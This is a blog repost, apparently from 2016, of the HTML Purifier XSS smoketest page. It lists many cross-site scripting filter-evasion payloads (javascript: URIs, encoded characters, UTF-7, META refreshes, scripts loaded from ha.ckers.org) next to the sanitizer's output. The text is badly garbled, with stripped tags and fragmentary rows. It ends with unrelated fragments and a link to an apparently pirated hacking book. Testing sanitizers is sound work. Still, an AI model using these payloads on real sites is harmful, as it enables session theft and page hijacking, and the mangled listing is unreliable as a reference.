Tuesday, June 7, 2016

HTML Purifier XSS Attacks Smoketest ( http://htmlpurifier.org/live/smoketests/xssAttacks.php)

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

NameRawOutputRender
XSS Locator
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//-->
» CRIPT>">'>» >

SCRIPT w/Source File


SCRIPT w/Char Code


BASE
»
HREF="javascript:alert('XSS' » );//">

BGSOUND
»
SRC="javascript:alert('XSS') » ;">

BODY background-image
»
BACKGROUND="javascript:alert » ('XSS');">

BODY ONLOAD


                

DIV background-image 1
»
STYLE="background-image: » url(javascript:alert('XSS')) » ">

DIV background-image 2
»
STYLE="background-image: » url(javascript:alert('XS » S'))">

DIV expression
»
expression(alert('XSS'));">

FRAME
»
SRC="javascript:alert('XSS') » ;">

IFRAME


INPUT Image
»
SRC="javascript:alert('XSS') » ;">

IMG w/JavaScript Directive
»
SRC="javascript:alert('XSS') » ;">

IMG No Quotes/Semicolon
»
SRC=javascript:alert('XSS')>

IMG Dynsrc
»
DYNSRC="javascript:alert('XS » S');">

IMG Lowsrc
»
LOWSRC="javascript:alert('XS » S');">

IMG Embedded commands 1
»
SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode">
»
src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" />
somecommand.php?somevariables=maliciousc
IMG STYLE w/expression
exp/*»
STYLE='no\xss:noxss("*//*"); » xss:ex/*XSS*//*/* » /pression(alert("XSS"))'>
exp/*
exp/*
List-style-image
  • XSS
  • XSS
  • XSS
IMG w/VBscript
»
SRC='vbscript:msgbox("XSS")' » >

LAYER
»
SRC="http://ha.ckers.org/scr » iptlet.html">

Livescript
»
SRC="livescript:[code]">

US-ASCII encoding
scriptalert(XSS)/script »
scriptalert(XSS)/script
scriptalert(XSS)/script
META
»
CONTENT="0;url=javascript:al » ert('XSS');">

META w/data:URL
»
CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K">

META w/additional URL parameter
»
CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');">

Mocha


OBJECT
»
TYPE="text/x-scriptlet" »
DATA="http://ha.ckers.org/sc »
riptlet.html">


OBJECT w/Embedded XSS
»
classid=clsid:ae24fdae-03c6- »
11d1-8b76-0080c744f389>»
m name=url »
value=javascript:alert('XSS' »
)>


Embed Flash
»
SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED>

STYLE


STYLE w/Comment
»
STYLE="xss:expr/*XSS*/ession » (alert('XSS'))">

STYLE w/Anonymous HTML
»
STYLE="xss:expression(alert( » 'XSS'))">

STYLE w/background-image
»
CLASS=XSS>

STYLE w/background


Stylesheet
»
HREF="javascript:alert('XSS' » );">

Remote Stylesheet 1
»
HREF="http://ha.ckers.org/xs » s.css">

Remote Stylesheet 2


Remote Stylesheet 3
»
Content="» g/xss.css>; REL=stylesheet">

Remote Stylesheet 4


TABLE
»
BACKGROUND="javascript:alert » ('XSS')">

TD
»
BACKGROUND="javascript:alert » ('XSS')">

XML namespace

»
namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> X » SS
<?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
XSS
XSS
XML data island w/CDATA
»
ID=I><![CDATA[» SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> » » DATAFLD=C DATAFORMATAS=HTML>
<IMG »
SRC="javascript:alert('XSS') »
;">

XML data island w/comment
»
SRC="javascript:alert('XSS')">< » /I> » DATASRC="#xss" DATAFLD="B" » DATAFORMATAS="HTML">
»
alt="javas<!-- » -->cript:alert('XSS')" » />
javas<!-- -->cript:alert('XSS')
XML (locally hosted)
»
SRC="http://ha.ckers.org/xss » test.xml" ID=I> » DATASRC=#I DATAFLD=C » DATAFORMATAS=HTML>

XML HTML+TIME

»
prefix="t" » ns="urn:schemas-microsoft-co » m:time"> » namespace="t" » implementation="#default#tim » e2"> » attributeName="innerHTML" » to="XSS" » >
<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">

<?import »
namespace="t" »
implementation="#default#tim »
e2">
Commented-out Block


Cookie Manipulation
»
HTTP-EQUIV="Set-Cookie" » Content="USERID=">

Local .htc file
»
url(http://ha.ckers.org/xss. » htc);">

Rename .js to .jpg


SSI


PHP
»
echo('aler » t("XSS")'); ?>
<? echo('alert("XSS")'); »
?>
JavaScript Includes


                


        

Character Encoding Example
<
%3C
&lt
<
&LT
<
&#60 »

&#060
&#0060

&#00060
&#000 »
060
&#0000060
<
<
& »
#0060;
<
<
&# »
0000060;
&#x3c
&#x03c
&#x003 »
c
&#x0003c
&#x00003c
&#x0000 »
03c
<
<

< »

<
<
&#x000 »
003c;
&#X3c
&#X03c
&#X003c
& »
#X0003c
&#X00003c
&#X000003c »

<
<
<
&#X »
0003c;
<
&#X000003c »
;
&#x3C

&#x03C
&#x003C
&#x0 »
003C
&#x00003C
&#x000003C
&# »
x3C;
<
<
&#x000 »
3C;
<
<
& »
#X3C
&#X03C
&#X003C
&#X0003C »

&#X00003C
&#X000003C

&#X3C »
;
<
<
< »

<
<
\x3c »

\x3C
\u003c
\u003C
<
%3C
&lt
<
&L »
T
&LT;
<
<
<

& »
lt;
<
<
<
<
< »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »
<
<
<
<
<
&lt »
;

<
<
<
<
<
 »
<
<
<
<
<
&lt »
;
<
<
<
<
<
& »
lt;

<
<
<
<
&lt »
;
<
\x3c
\x3C
\u003c
\u00 »
3C
< %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive
»
SRC=JaVaScRiPt:alert('XSS')>

HTML Entities
»
SRC=javascript:alert("X » SS")>

Grave Accents
»
SRC=`javascript:alert("RSnak » e says, 'XSS'")`>
»
src="%60javascript%3Aalert(" » alt="`javascript:alert(&quot » ;RSnake" />
`javascript:alert("RSnake
Image w/CharCode
»
SRC=javascript:alert(String. » fromCharCode(88,83,83))>

UTF-8 Unicode Encoding
»
SRC=java&# » 115;crip& » #116;:ale& » #114;t('X&# » 83;S')>

Long UTF-8 Unicode w/out Semicolons
»
SRC=&#0000106&#0000097&#0000 » 118&#0000097&#0000115&#00000 » 99&#0000114&#0000105&#000011 » 2&#0000116&#0000058&#0000097 » &#0000108&#0000101&#0000114& » #0000116&#0000040&#0000039&# » 0000088&#0000083&#0000083&#0 » 000039&#0000041>

DIV w/Unicode
»
STYLE="background-image:\007 » 5\0072\006C\0028'\006a\0061\ » 0076\0061\0073\0063\0072\006 » 9\0070\0074\003a\0061\006c\0 » 065\0072\0074\0028.1027\0058 » .1053\0053\0027\0029'\0029">

Hex Encoding w/out Semicolons
»
SRC=&#x6A&#x61&#x76&#x61&#x7 » 3&#x63&#x72&#x69&#x70&#x74&# » x3A&#x61&#x6C&#x65&#x72&#x74 » &#x28&#x27&#x58&#x53&#x53&#x » 27&#x29>

UTF-7 Encoding
»
HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » +ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes
\";alert('XSS');//
\";alert('XSS');//
\";alert('XSS');//
End title tag



                

STYLE w/broken up JavaScript


Embedded Tab
»
SRC="jav\tascript:alert('XSS' » );">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Encoded Tab
»
SRC="jav ascript:alert( » 'XSS');">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Newline
»
SRC="jav ascript:alert( » 'XSS');">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Carriage Return
»
SRC="jav ascript:alert( » 'XSS');">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Multiline w/Carriage Returns
»
p t : a l e r t ( ' X S S ' » ) " >
»
src="j%20a%20v%20a%20s%20c%2 » 0r%20i%20p%20t%20%3A%20a%20l » %20e%20r%20t%20(%20'%20X%20S » %20S%20'%20)" alt="j a v a s » c r i p t : a l e r t ( ' X » S" />
j a v a s c r i p t : a l e r t ( ' X S
Null Chars 1
»
SRC=java\0script:alert("XSS") » >

Null Chars 2
&\0
IPT>alert("XSS")\0 » IPT>
&
&
Spaces/Meta Chars
»
javascript:alert('XSS');">

Non-Alpha/Non-Digit


Non-Alpha/Non-Digit Part 2
»
onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")>

No Closing Script Tag


Evade Regex Filter 1


Evade Regex Filter 2


Evade Regex Filter 3


Evade Regex Filter 4


Evade Regex Filter 5


Filter Evasion 1
PT »
SRC="http://ha.ckers.org/xss »
.js">
PT »
SRC="http://ha.ckers.org/xss »
.js">
PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2


IP Encoding
»
HREF="http://66.102.7.147/"> » XSS
»
href="http://66.102.7.147/"> » XSS URL Encoding
»
HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS
XSS
Dword Encoding
»
HREF="http://1113982867/">XS » S
XSS
Hex Encoding
»
HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS
XSS
Octal Encoding
»
HREF="http://0102.0146.0007. » 00000223/">XSS
XSS
Mixed Encoding
»
HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS
»
href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS Protocol Resolution Bypass
»
HREF="//www.google.com/">XSS »
XSS
Firefox Lookups 1
XSS
XSS
Firefox Lookups 2
»
HREF="http://ha.ckers.org@go » ogle">XSS
»
href="http://google">XSS Firefox Lookups 3
»
HREF="http://google:ha.ckers » .org">XSS
»
href="http://google">XSS Removing Cnames
»
HREF="http://google.com/">XS » S
XSS
Extra dot for Absolute DNS
»
HREF="http://www.google.com. » /">XSS
XSS
JavaScript Link Location
»
HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS
XSS
Content Replace
»
HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A>
»
href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a>
 

Beatles - Yellow Submarine



http://fortay.teknikata.com/infosec/Web%20App%20Hacking%20%28Hackers%20Handbook%29.pdf

Man in the Rain